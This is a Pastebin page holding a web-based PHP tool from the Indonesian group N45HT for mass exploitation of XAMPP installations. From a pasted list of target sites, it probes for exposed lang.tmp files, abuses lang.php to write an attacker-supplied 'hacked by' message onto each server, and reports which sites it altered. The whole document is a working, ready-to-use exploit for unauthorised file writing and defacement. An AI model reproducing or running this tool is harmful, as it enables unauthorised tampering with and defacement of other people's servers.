choirurrizal

[WEB BASED] Mass Exploiter XAMPP Local Write Access

Dec 15th, 2017
915
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.70 KB | None | 0 0
  1. <!--
  2.  
  3. coded by ShinChan - N45HT | 15/12/2017
  4. updated at 20/11/2018 22:51 (Asia/Jakarta)
  5.  
  6. # ShinChan - N45HT - N45HT.WEB.ID
  7. # fb.com/angelia.put - fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  8.  
  9. note : jangan hapus copyright, hargai pembuat
  10.  
  11. -->
  12. <!doctype html>
  13. <html>
  14.     <head>
  15.         <title>XAMPP Local Write Access Auto Xploiter - Web Based</title>
  16.         <meta name='description' content='XAMPP Local Write Access Auto Exploit!!!' />
  17.         <meta name='author' content='N45HT' />
  18.         <style type='text/css'>
  19.             body {
  20.                 margin:20 auto;
  21.                 background:white;
  22.                 color:black;
  23.                 font-family:verdana;
  24.                 text-align:center;
  25.                 text-shadow: 0 .05rem .1rem rgba(0,0,0,.5);
  26.  
  27.             }
  28.             input[type=submit] {
  29.                 border: 1px solid rgb(100,100,100);
  30.                 color: black;
  31.                 background: transparent;
  32.                 width: 500px;
  33.                 height:35px;
  34.                 font-family:verdana;
  35.                 border-radius:5px;
  36.             }
  37.             input[type=submit]:hover{
  38.                 background-color:gray;
  39.                 color:white;
  40.             }
  41.             input[type=text] {
  42.                 border: 1px solid rgb(100,100,100);
  43.                 color: #000;
  44.                 height:35px;
  45.                 width:500px;
  46.                 font-family:verdana;
  47.                 border-radius:5px;
  48.             }
  49.             textarea {
  50.                 background: transparent;
  51.                 color: #000;
  52.                 border: 1px solid rgb(100,100,100);
  53.                 resize: none;
  54.                 width: 500px;
  55.                 height: 180px;
  56.                 padding-left: 5px;
  57.                 margin: 5px auto;
  58.                 font-family:verdana;
  59.                 border-radius:5px;
  60.             }
  61.             a{
  62.                 text-decoration:none;
  63.             }
  64.         </style>
  65.     </head>
  66.     <body>
  67.         <font size='6'>XAMPP Local Write Access Auto Xploiter</font>
  68.         <br><br>
  69.         <font size='2'>coded by : ShinChan - N45HT</font>
  70.         <br>
  71.         <font size='2'>thanks to : PETR03X - Comod0x - SCYTHE404_LOL - Grav3 - FRU_403</font>
  72.         <br><br><br>
  73.         <form method='POST' action=''>
  74.             Target :<br>
  75.             <textarea name='target' placeholder='target.com or target.com/[path]' required></textarea><br><br>
  76.             kata kata terakhir :<br>
  77.             <input type='text' name='msg' placeholder='hacked by Indonesian h4x0r'/>
  78.             <br><br>
  79.             <input type='submit' value='Exploit!!!' />
  80.         </form>
  81.         <?php
  82.         error_reporting(0);
  83.         if($_POST){
  84.             $target = $_POST['target'];
  85.             $msg = htmlspecialchars(str_replace(" ","_",$_POST['msg']));
  86.             $msg1 = str_replace("<","_",$msg);
  87.             $msg2 = str_replace(">","_",$msg1);
  88.             $msg3 = str_replace("&gt;","_",$msg2);
  89.             $pwn = str_replace("&lt;","_",$msg3);
  90.            
  91.             if($pwn == ""){
  92.                 $pwn = "hacked_by_N45HT";
  93.             }
  94.            
  95.             $targets = explode("\r\n",$target);
  96.             foreach($targets as $site){
  97.                 if(!preg_match("/^http:\/\//",$site) AND !preg_match("/^https:\/\//",$site)){
  98.                     $sites = "http://$site";
  99.                 }else{
  100.                     $sites = $site;
  101.                 }
  102.                 $showsites = htmlspecialchars($sites);
  103.                
  104.                 $chx = curl_init("$sites/xampp/lang.tmp");
  105.                 curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
  106.                 curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
  107.                 curl_setopt($chx, CURLOPT_SSL_VERIFYPEER, 0);
  108.                 curl_setopt($chx, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  109.                 curl_exec($chx);
  110.                 $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
  111.                 curl_close($chx);
  112.                
  113.                 $chs = curl_init("$sites/security/lang.tmp");
  114.                 curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  115.                 curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  116.                 curl_setopt($chs, CURLOPT_SSL_VERIFYPEER, 0);
  117.                 curl_setopt($chs, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  118.                 curl_exec($chs);
  119.                 $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
  120.                 curl_close($chs);
  121.                
  122.                 if($httpcodex == 200){
  123.                     $ck = curl_init("$sites/xampp/lang.php?$pwn");
  124.                     curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  125.                     curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  126.                     curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
  127.                     curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  128.                     $cka = curl_exec($ck);
  129.                     if($cka){
  130.                         $ch = curl_init("$sites/xampp/lang.tmp");
  131.                         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  132.                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  133.                         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  134.                         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  135.                         $cek = curl_exec($ch);
  136.                         if(preg_match("/$pwn/",$cek)){
  137.                             echo "<a href='$sites/xampp/lang.tmp' target='_blank'>$showsites/xampp/lang.tmp</a> => OK<br>";
  138.                         }else{
  139.                             echo "$showsites => FAILED<br>";
  140.                         }
  141.                         curl_close($ch);
  142.                     }
  143.                 }else if($httpcodes == 200){
  144.                     $ck = curl_init("$sites/security/lang.php?$pwn");
  145.                     curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  146.                     curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  147.                     curl_setopt($ck, CURLOPT_SSL_VERIFYPEER, 0);
  148.                     curl_setopt($ck, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  149.                     $cka = curl_exec($ck);
  150.                     if($cka){
  151.                         $ch = curl_init("$sites/security/lang.tmp");
  152.                         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  153.                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  154.                         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  155.                         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0");
  156.                         $cek = curl_exec($ch);
  157.                         if(preg_match("/$pwn/",$cek)){
  158.                             echo "<a href='$sites/security/lang.tmp' target='_blank'>$showsites/security/lang.tmp</a> => OK<br>";
  159.                         }else{
  160.                             echo "$showsites => FAILED<br>";
  161.                         }
  162.                         curl_close($ch);
  163.                     }
  164.                 }else{
  165.                     echo "$showsites => Not Vuln<br>";
  166.                 }
  167.             }
  168.         }
  169.         ?>
  170.         <p style='margin-top:50px;'>copyright@<a href='https://facebook.com/N45HTOfficial'>N45HT</a>.</p>
  171.     </body>
  172. </html>
Advertisement
Add Comment
Please, Sign In to add comment